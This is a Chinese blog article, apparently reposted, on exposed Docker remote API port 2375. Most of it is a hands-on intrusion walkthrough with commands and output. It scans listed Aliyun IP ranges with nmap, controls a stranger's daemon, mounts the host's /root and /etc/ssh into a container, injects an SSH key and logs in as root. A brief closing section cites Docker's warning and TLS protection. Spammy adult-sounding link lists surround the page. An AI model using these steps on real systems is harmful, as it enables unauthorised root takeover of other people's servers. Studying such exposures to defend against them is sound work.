成人在线亚洲_国产日韩视频一区二区三区_久久久国产精品_99国内精品久久久久久久

您的位置:首頁技術(shù)文章
文章詳情頁

Docker暴露2375端口導(dǎo)致服務(wù)器被攻擊問題及解決方法

瀏覽:290日期:2024-11-21 11:23:18

相信了解過docker remote API的同學(xué)對2375端口都不陌生了,2375是docker遠程操控的默認端口,通過這個端口可以直接對遠程的docker daemon進行操作。

當(dāng)$HOST主機以docker daemon -H=0.0.0.0:2375方式啟動daemon時,可以在外部機器對$HOST的docker daemon進行直接操作:

docker -H tcp://$HOST:2375 ps

好,說說如何“入侵”,怎么通過這個端口入侵宿主機呢?

這個應(yīng)該要從幾個點說起吧:1. docker對user namespace沒有做隔離,也就是說,容器內(nèi)部的root用戶就是宿主機的root用戶,一旦掛載目錄,就可以在容器內(nèi)部以宿主機的root用戶身份對掛載的文件系統(tǒng)隨意修改了。

docker服務(wù)擁有很高的執(zhí)行權(quán)利(相當(dāng)于root),并且在docker用戶組下的普通用戶不需要任何其他驗證就可以執(zhí)行docker run等命令。 暴露的docker remote API端口如果沒有啟動ssl驗證的話,任何能連通到這臺docker宿主機的的機器都可以隨意操作這臺docker宿主機的docker daemon(docker run、docker ps、docker rm等等這些命令都不在話下)。

結(jié)合以上3點,就基本具備入侵docker宿主機的條件了

講得似乎有點懸,不多說,直接拿一個活鮮鮮的例子來講吧:

(請允許我用最近新學(xué)的一道菜將流程帶過 ?( ̄? ̄)? )

秘制紅燒肉(docker版)

材料:一整塊一整塊的“5花”IP段,越肥越好(小白用戶越多越好)

配料:nmap,docker

step 1: 掃描2375端口

怎么掃?我選用的是簡單易用的黑客必備神器nmap了。

掃哪里呢?我選的目標(biāo)是aliyun的IP段,百度得知:

42.96.128.0/17 Alibaba (Beijing) Technology Co., Ltd. China 42.120.0.0/16 Aliyun Computing Co., LTD China 42.121.0.0/16 Aliyun Computing Co., LTD China 42.156.128.0/17 Aliyun Computing Co., LTD China 110.75.0.0/16 Asia Pacific Network Information Centre China 110.76.0.0/19 Ali Technology Co., Ltd China 110.76.32.0/20 Aliyun Computing Co., LTD China 110.173.192.0/20 HiChina Web Solutions (Beijing) Limited China 110.173.208.0/20 HiChina Web Solutions (Beijing) Limited China 112.124.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 112.127.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 114.215.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 115.28.0.0/16 HiChina Web Solutions (Beijing) Limited China 115.29.0.0/16 HiChina Web Solutions (Beijing) Limited China 115.124.16.0/22 Hangzhou Alibaba Advertising Co.,Ltd. China 115.124.20.0/22 Hangzhou Alibaba Advertising Co.,Ltd. China 115.124.24.0/21 Hangzhou Alibaba Advertising Co.,Ltd. China 119.38.208.0/21 Hangzhou Alibaba Advertising Co.,Ltd. China 119.38.216.0/21 Hangzhou Alibaba Advertising Co.,Ltd. China 119.42.224.0/20 Alibaba (China) Technology Co., Ltd. China 119.42.242.0/23 Hangzhou Alibaba Advertising Co.,Ltd. China 119.42.244.0/22 Hangzhou Alibaba Advertising Co.,Ltd. China 121.0.16.0/21 Hangzhou Alibaba Advertising Co.,Ltd. China 121.0.24.0/22 Hangzhou Alibaba Advertising Co.,Ltd. China 121.0.28.0/22 Hangzhou Alibaba Advertising Co.,Ltd. China 121.196.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 121.197.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 121.198.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 121.199.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 140.205.0.0/16 Aliyun Computing Co., LTD China 203.209.250.0/23 Hangzhou Alibaba Advertising Co.,Ltd. China 218.244.128.0/19 Hangzhou Alibaba Advertising Co.,Ltd. China 223.4.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 223.5.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 223.5.5.0/24 Hangzhou Alibaba Advertising Co.,Ltd. China 223.6.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 223.6.6.0/24 Hangzhou Alibaba Advertising Co.,Ltd. China 223.7.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd.

我不生產(chǎn)IP,我只是百度的搬運工,別問我這些IP從那來,我也想知道~ >.<

將上面IP內(nèi)容保存在一個文件中,如 aliyun.list

開始掃描:

cat aliyun.list| awk ’{print $1}’ | xargs -n 1 -I {} nmap -sT -p2375 {} --open # 簡單解釋一下命令:# awk 將第一列IP網(wǎng)段過濾出來# xargs 將過濾出來的IP一個一個的分次送給nmap,-I {} 是指使用{}來代替?zhèn)魉偷膮?shù)# ...# Starting Nmap 7.01 ( https://nmap.org ) at 2016-06-05 09:57 CST# Nmap scan report for 42.96.MOSAIC.MOSAIC# Host is up (0.070s latency).# PORT STATE SERVICE# 2375/tcp open docker# ...

不到兩分鐘,第一塊42.96.MOSAIC.MOSAIC(五花肉已打碼) “五花肉”選好了,來吧~

step 2: 測試2375的直接控制權(quán)

docker -H tcp://42.96.MOSAIC.MOSAIC:2375 ps # CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS # 73aa690e7c92 imdjh/owncloud-with-ocdownloader '/entrypoint.sh' 9 days ago Up 3 days 0.0.0.0:9009->80# f57c56af0e29 rethinkdb:2.3.2 'rethinkdb --bind all' 9 days ago Up 3 days 8080/tcp, 28015/# 37c1401db593 gaomd/ikev2-vpn-server:0.3.0 '/bin/sh -c /usr/bin/' 10 days ago Up 3 days 0.0.0.0:500->500# af7338a5426d nginx:1.9-alpine 'nginx -g ’daemon off' 3 weeks ago Up 3 days 443/tcp, 0.0.0.0# ...

這個服務(wù)器的owner也太配合了(⊙ο⊙),ps直接看到內(nèi)容,說明這個主機的2375是沒有ssl驗證的,基本滿足入侵要求。

“五花”洗好,切好,準(zhǔn)備下鍋~

step 3: 遠程啟動自己的容器

拿到了docker的控制權(quán)能做什么呢?拿到了就呵呵了~

# images 看看本地已有的鏡像# docker -H tcp://42.96.MOSAIC.MOSAIC:2375 images# ...# swarm latest 47dc182ea74b 4 weeks ago 19.32 MB# jwilder/nginx-proxy latest 203b20631e41 4 weeks ago 255.6 MB# ubuntu latest c5f1cf30c96b 4 weeks ago 120.8 MB# shipyard/shipyard latest ba426f0944bc 5 weeks ago 58.92 MB# ...

省略了一部分輸出,鏡像還蠻多的,就選個ubuntu吧

# docker -H tcp://42.96.MOSAIC.MOSAIC:2375 run --rm -it --entrypoint bash -v /root:/tmp/root -v /etc/ssh:/tmp/ssh_etc -v /var/log:/tmp/log ubuntu

看到這步,相信對ssh有一些了解的同學(xué)應(yīng)該就明白了

step 4: ssh pub key 注入

在剛剛啟動的容器中先看看 /tmp/ssh_etc/sshd_config (就是宿主機的/etc/ssh/sshd_config) 的PermitRootLogin字段。如果是no就改成yes,允許root通過ssh登錄

然后在你的機器上生成一對新的pub key(已經(jīng)有ssh key的也建議生成一個新的,不要使用自己日常使用的ssh pub key)

# 使用 ssh-keygen生成ssh-keygen -t rsa -C 'hello@world.com'# 執(zhí)行命令后的提示Enter file in which to save the key要看好,不要把自己的ssh key覆蓋了,可以選著/tmp/id_rsa# 其他提示enter到底即可

繼續(xù),注入ssh pub key,回到剛剛啟動的容器執(zhí)行

cat >> /tmp/root/.ssh/authorized_keys <<EOF>ssh-rsa AAA.... # 這里粘貼你剛剛在自己機器生成的/tmp/id_rsa.pub>EOF # 如果/tmp/root/.ssh目錄不存在,就直接創(chuàng)建

八角香葉生抽老抽醋都加上,中火烹飪,準(zhǔn)備出鍋~

step 5: 登入服務(wù)器

# ssh -i 指定秘鑰登錄ssh -i /tmp/id_rsa root@42.96.MOSAIC.MOSAIC # Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic x86_64)## * Documentation: https://help.ubuntu.com/## Welcome to aliyun Elastic Compute Service!## Last login: Fri Jun 3 01:38:07 2016 from 120.85.MOSAIC.MOSAIC# manpath: can’t set the locale; make sure $LC_* and $LANG are correct# root@iZ28p9b7e***:~# # ...

大火收汁,起鍋!

鄭重聲明

以上教程僅為交流學(xué)習(xí)之用,42.96.MOSAIC.MOSAIC 服務(wù)器上的id_rsa.pub在制作完本教程后已主動清除,并在服務(wù)上留言告知。

如果你一不小心也發(fā)現(xiàn)了可用的2375端口,希望也能點到即止,誤做他用,或者發(fā)現(xiàn)其他入侵漏洞,可以和大家交流學(xué)習(xí)。

2375是docker漏洞嗎?

非也!2375直接裸露地暴露在公網(wǎng)上純屬是用戶習(xí)慣或者偷懶的問題2375可以在相對安全的內(nèi)部網(wǎng)絡(luò)中方便測試使用,并不適合使用在投入到生產(chǎn)環(huán)境中。

docker官網(wǎng)第一篇文檔quick start上有句話是這樣子的:

Warning: Changing the default docker daemon binding to a TCP port orUnix docker user group will increase your security risks by allowingnon-root users to gain root access on the host. Make sure you controlaccess to docker. If you are binding to a TCP port, anyone withaccess to that port has full Docker access; so it is not advisable on an open network.

已經(jīng)Warning告知:如果將daemon直接暴露在一個TCP端口,將可能會被以非root用戶去獲取宿主機的root權(quán)限。其實上面的說提到的服務(wù)器之所以這么容器被入侵,也正是這個原因。

何以防之

那么,問題來了,如果想用Remote API,又不想有被入侵的風(fēng)險,怎么辦呢?

docker官方文檔上介紹了一種通過CA認證方式使用Remote API

具體可以參考:Protect the Docker daemon socket

(等理解了再補一篇博客吧,就姑且讓我以一個鏈接的形式帶過吧O.O)

配置過程還算是比較簡單的,下面放一張圖,展示配置SSL后的效果:

Docker暴露2375端口導(dǎo)致服務(wù)器被攻擊問題及解決方法

到此這篇關(guān)于Docker暴露2375端口導(dǎo)致服務(wù)器被攻擊問題及解決方法的文章就介紹到這了,更多相關(guān)docker 暴露2375 端口內(nèi)容請搜索好吧啦網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持好吧啦網(wǎng)!

標(biāo)簽: Docker
相關(guān)文章:
成人在线亚洲_国产日韩视频一区二区三区_久久久国产精品_99国内精品久久久久久久
91精品欧美久久久久久动漫| 黄色一区二区三区四区| 欧美国产先锋| 日韩久久久久久| 国产一区二区伦理片| 欧美少妇一区二区| 蜜桃一区二区三区在线观看| 性伦欧美刺激片在线观看| 亚洲综合视频网| 99www免费人成精品| 亚洲欧洲国产专区| 在线播放亚洲| 亚洲美女少妇撒尿| 亚洲深夜av| 亚洲免费av高清| 欧美日韩精品一区| 亚洲国产成人私人影院tom| 欧美精品一区三区在线观看| 国产精品久久久久久久第一福利| 黄色综合网站| 一区二区欧美在线观看| 亚洲欧美国产不卡| 日韩精品色哟哟| 在线免费观看视频一区| 久国产精品韩国三级视频| 欧美丝袜丝交足nylons| 国内精品久久久久影院一蜜桃| 在线成人av网站| 成人美女视频在线看| 久久久噜噜噜久久中文字幕色伊伊 | 亚洲欧美日韩精品在线| 午夜精品123| 在线不卡a资源高清| 成人国产在线观看| 国产女人aaa级久久久级| 尤妮丝一区二区裸体视频| 一区二区三区欧美亚洲| 欧洲一区二区av| 国产精品1024| 久久久久久久久久久久久女国产乱| 国产精品二区三区四区| 亚洲人123区| 色综合久久88色综合天天| 美脚の诱脚舐め脚责91| 日韩欧美成人激情| 欧美日韩免费高清| 亚洲成精国产精品女| 欧美日韩免费观看一区二区三区| 国产成人av网站| 国产日韩欧美精品在线| 国产一区导航| 久久成人麻豆午夜电影| 久久伊人中文字幕| 国产偷久久久精品专区| 九九在线精品视频| www国产亚洲精品久久麻豆| 亚洲全部视频| 免费成人小视频| 在线播放一区二区三区| 欧美一区高清| 亚洲国产三级在线| 91精品婷婷国产综合久久竹菊| 91无套直看片红桃| 亚洲国产成人av| 在线观看91精品国产麻豆| 色综合网色综合| 亚洲第一久久影院| 日韩免费视频一区| 日韩视频精品| 国产制服丝袜一区| 国产精品久久久久一区二区三区| 蜜乳av另类精品一区二区| 国产高清亚洲一区| 国产精品久久久一本精品 | 蜜桃一区二区三区在线观看| 久久久久久久久久美女| 亚洲一卡久久| 处破女av一区二区| 一区二区三区四区激情| 欧美一级精品在线| 亚洲黄页一区| 国产一区二区电影| 亚洲精品视频免费看| 91麻豆精品91久久久久久清纯| 亚洲无吗在线| 久久97超碰国产精品超碰| 欧美激情在线一区二区三区| 色哟哟在线观看一区二区三区| 99国产精品99久久久久久| 婷婷久久综合九色综合绿巨人 | 国产婷婷一区二区| 色哟哟一区二区| 欧美在线视频二区| 裸体在线国模精品偷拍| 国产精品三级视频| 欧美日韩国产高清一区二区| 亚洲第一黄网| 高清shemale亚洲人妖| 亚洲高清在线精品| 久久久不卡网国产精品一区| 欧美在线视频日韩| 亚洲国产裸拍裸体视频在线观看乱了中文 | 亚洲成人精品在线观看| 久久久夜色精品亚洲| 欧美在线不卡视频| 在线日本高清免费不卡| 丁香桃色午夜亚洲一区二区三区| 亚洲精品视频一区二区| 精品久久久久久综合日本欧美| 色哦色哦哦色天天综合| 亚洲国内自拍| 97久久精品人人爽人人爽蜜臀| 男女激情视频一区| 亚洲免费av在线| 久久久精品欧美丰满| 欧美老人xxxx18| 模特精品在线| 黄色在线成人| 成人免费电影视频| 激情文学综合网| 亚洲一卡二卡三卡四卡五卡| 国产欧美一区二区精品秋霞影院 | 伊人开心综合网| 久久毛片高清国产| 91精品国产福利| 久久精选视频| 伊甸园精品99久久久久久| 成人av在线影院| 激情综合网天天干| 丝袜国产日韩另类美女| 亚洲欧美一区二区三区孕妇| 日韩午夜中文字幕| 欧美日韩高清一区二区三区| 亚洲一区免费看| 在线观看一区| 91麻豆swag| 国产成人在线视频网址| 蜜臀a∨国产成人精品| 亚洲高清在线精品| 一区二区三区精品| 1024成人网色www| 国产喂奶挤奶一区二区三区| 日韩免费在线观看| 51精品秘密在线观看| 91久久精品国产91性色tv| 国产精品一页| 亚洲精品国产精品国自产观看| 欧美日韩少妇| av毛片久久久久**hd| 国产精品一卡二卡在线观看| 韩国毛片一区二区三区| 麻豆国产欧美日韩综合精品二区| 亚洲成a人片在线观看中文| 亚洲日本一区二区三区| 中文字幕欧美日韩一区| 国产亚洲欧洲一区高清在线观看| 欧美精品一区二区三区在线播放| 日韩一级免费观看| 日韩欧美自拍偷拍| 日韩欧美另类在线| 日韩欧美国产wwwww| 日韩三级高清在线| 欧美一区二区三区四区在线观看 | 国产精品成人免费精品自在线观看| 国产网站一区二区| 久久精品一二三| 国产午夜精品福利| 国产网红主播福利一区二区| 久久精品亚洲精品国产欧美| 国产欧美一区视频| 中文字幕 久热精品 视频在线| 中文字幕不卡一区| 国产精品乱码人人做人人爱| 国产精品护士白丝一区av| 国产精品午夜春色av| 国产精品久久久久婷婷二区次| 国产精品久久久久一区| 综合婷婷亚洲小说| 亚洲一区在线电影| 日韩电影免费在线看| 久久精品72免费观看| 精品一二三四区| 国产成人在线网站| 91在线观看美女| 欧美精品福利| 激情久久婷婷| 国产精品一区视频| 久久一区精品| 欧美色视频在线观看| 欧美日本一区二区三区四区| 5858s免费视频成人| 欧美电视剧在线看免费| 久久久久久影视| 国产精品视频一二| 一区二区三区视频在线观看| 午夜精品福利一区二区蜜股av| 久久精品99国产精品日本| 粉嫩高潮美女一区二区三区| 91免费版pro下载短视频| 亚洲国产免费|